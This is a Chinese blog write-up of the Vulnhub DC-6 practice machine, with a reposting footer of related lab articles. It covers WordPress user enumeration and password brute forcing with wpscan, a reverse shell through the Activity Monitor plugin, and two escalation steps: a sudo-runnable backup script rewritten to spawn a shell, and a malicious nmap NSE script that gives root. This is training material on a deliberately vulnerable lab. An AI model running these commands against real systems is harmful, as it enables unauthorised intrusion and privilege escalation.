Vulnhub-DC-6

最新推荐文章于 2024-04-20 17:38:48 发布
最新推荐文章于 2024-04-20 17:38:48 发布
阅读量229 收藏
点赞数
分类专栏: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40569903/article/details/109394249
版权

入门系列第三弹DC-6

基本信息

下载地址:DC-6
靶机:vmware,192.168.172.138
攻击机:kali2
Flag:1个

渗透过程

0x01 nmap扫描

扫描一下,只有22和80开放,然后注意一下作者告诉我们配置一下host了,记得改成wordy。
在这里插入图片描述

0x02 漏洞发现

访问wordy后,发现还是和之前的dc-2一个界面啊,估计又是wp吧。
在这里插入图片描述
访问一下/wp-admin成功之后,确认就是wp了,wpscan一样先扫一手用户名。然后保存一下,准备爆破。

wpscan --url http://wordy/ -e u

在这里插入图片描述
这个时候如果直接用字典的话,可能会浪费很多时间。记得看一看作者写的信息。
可以看见作者给了我们一条命令用来生成字典。

Clue
OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. 😉

开始跑账户密码。找到了mark的密码。

wpscan --url http://wordy/ -e --usernames username.txt -P password.txt

在这里插入图片描述
进入后台后看一看,最开始直接扫描的时候是没看见有什么插件的。进来后看见使用了Activity monitor插件,搜索一下看看有没有可以使用的漏洞。发现了三个,使用第三个页面。
在这里插入图片描述

0x03 漏洞利用

首先看一下EXP,将其中的利用部分url改为wordy,将nc反弹命令修改一下。
在这里插入图片描述
然后生成html页面,点击界面中的按钮,并监听对应端口。经典操作反弹交互shell。
在这里插入图片描述

0x04 水平越权

我们是有mark用户的,那不如先去/home看看,发现stuff,看一看,发现things-to-do.txt。发现有一个账户密码。
在这里插入图片描述

su看一下这个账户有什么。发现有一个不需要密码执行的文件。
在这里插入图片描述
看一下什么内容。发现是一个打包命令。既然是可执行的,那么就直接写命令反弹jens的shell。
在这里插入图片描述

如下执行命令。

cat /dev/null > /home/jens/backups.sh #清除源文件内容
vi /home/jens/backups.sh
i #输入模式
/bin/bash #切换jens的shell
ESC #进入命令模式
:wq #保存退出

然后我们执行命令。成功切换到jens。

sudo -u jens /home/jens/backups.sh

在这里插入图片描述

看一下可使用的命令,发现可以无密码使用nmap命令。
在这里插入图片描述

我们知道nmap是存在很多.nse的脚本的,直接在当前目录下写一个脚本,反弹root的shell。

echo "os.execute('/bin/bash')" > root.nse
sudo nmap --script root.nse

在这里插入图片描述

0x05 Get Flag

搞定。
在这里插入图片描述

总结

DC-6以WordPress的插件Activity monitor漏洞利用和水平越权为渗透的关键利用。有不会的命令和工具时一定要多用help和man,切忌直接百度~继续加油~

T1me0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub】---DC-6靶机
qq_43168364的博客
08-21 649
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
Vulnhub靶机渗透测试——DC-6
Cobra的博客
05-18 358
一、实验环境 攻击机(kali):192.168.189.148 靶机(ubuntu):192.168.189.186 二、信息收集 1、使用nmap探测存活主机 nmap -sP 192.168.189.0/24 2、IP192.168.189.186为我们的靶机,再次使用nmap对其进行深度扫描 nmap -sV -A -T4 -p- 192.168.189.186 3、访问IP后发现不能正常访问,我们可以像dc2一样修改hosts文件 4、修改完成后即可正常访问
Vulnhub靶机之DC-6
m0_60911102的博客
11-30 920
Vulnhub靶机之DC-6
vulnhub靶机:dc-6
waitagirl的博客
03-21 386
vulnhub靶机:dc-6
vulnhub靶场之DC-6
qq_58091216的博客
01-11 1134
只有一个flag。
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub靶机系列】DC6
Ms08067安全实验室
08-02 197
文章来源|MS08067 安全实验室本文作者:大方子(Ms08067实验室核心成员)主机信息Kali:192.168.0.128 DC-6:192.168.0.130实验过程先找到DC-6的IP地址sudoarp-scan--interfaceeth0192.168.0.1/24然后用Nmap对DC-6进行扫描sudonmap-sS-sC-sV-p-192.168.0.130可...
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
rumil的博客
04-20 1022
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
Vulhub 靶场训练 DC-6解析
黑战士的博客
02-23 1052
提示用kali自带的字典rockyou.txt导出包含k01的密码导出来的字典爆破(没解压的先解压,我之前解压过了)# nmap提权:以root的权限用nmap执行这个脚本,打开root shell的文件,再让nmap执行。第一:利用目录扫描工具寻找该CMS的后台管理系统,然后再爆破密码和账号,进入后台管理系统寻找可利用的点。进入/home/jens目录,打开backups.sh文件,里面是一个压缩命令行,说明该文件可以运行。可以在该文件中添加/bin/bash语句,则可以打开jens的shell了。
vulnhubdc6
qq_54030686的博客
06-14 853
DC系列第六篇,整体而言难度较低,此篇之后,不再进行较为细致的篇幅 总体逻辑:话不多说,开始干 主机发现,端口扫描 目标IP为192.168.43.140 开放两个端口22 和80 端口,其中80端口对应的服务为wordy,修改hosts文件,路径为/etc/hosts,添加值 22端口尝试进行爆破,采用用户名top50,字典使用弱口令top100进行尝试 未发现相应结果 进行指纹识别 发现为wordpress框架,使用wordpress专用扫描器进行检测,使用-e参数爆破用户 存在5个用户复制变异成字典
Vulnhub-DC-6靶机实战(Nmap提权)
御七彩虹猫
05-19 1534
Vulnhub-DC-6靶机实战(Nmap提权)
Vulnhub DC-6
Pai_Space
03-11 770
Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to g.
靶场练习第十四天~vulnhub靶场之dc-6
qq_57976347的博客
02-13 525
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接: 百度网盘 请输入提取码 提取码: bazx 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip 命令:sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -sV -p- 192.168.101.119 (2)看看详细信息 nmap -A -p- 192.168.101.119
[Vulnhub] DC-6
weixin_63231007的博客
01-29 422
DC系列靶机-第六弹(wp-Activity monitor插件rce漏洞getshell&nmap提权)
Vulnhub靶机实战——DC-6
冠霖L的博客
10-28 3878
靶机DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 15虚拟机软件 DC-6靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.142...
高频隔离软开关DC-DC变换技术研究
"2014年电源网年会上,沙德尚博士分享了关于高频隔离软开关DC-DC变换器的研究成果,主要包括全桥+Boost混合式高效率变换器、输入串联输出并联(ISOP)移相全桥全范围软开关变换器以及三电平移相+LLC混合变换器的探讨...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值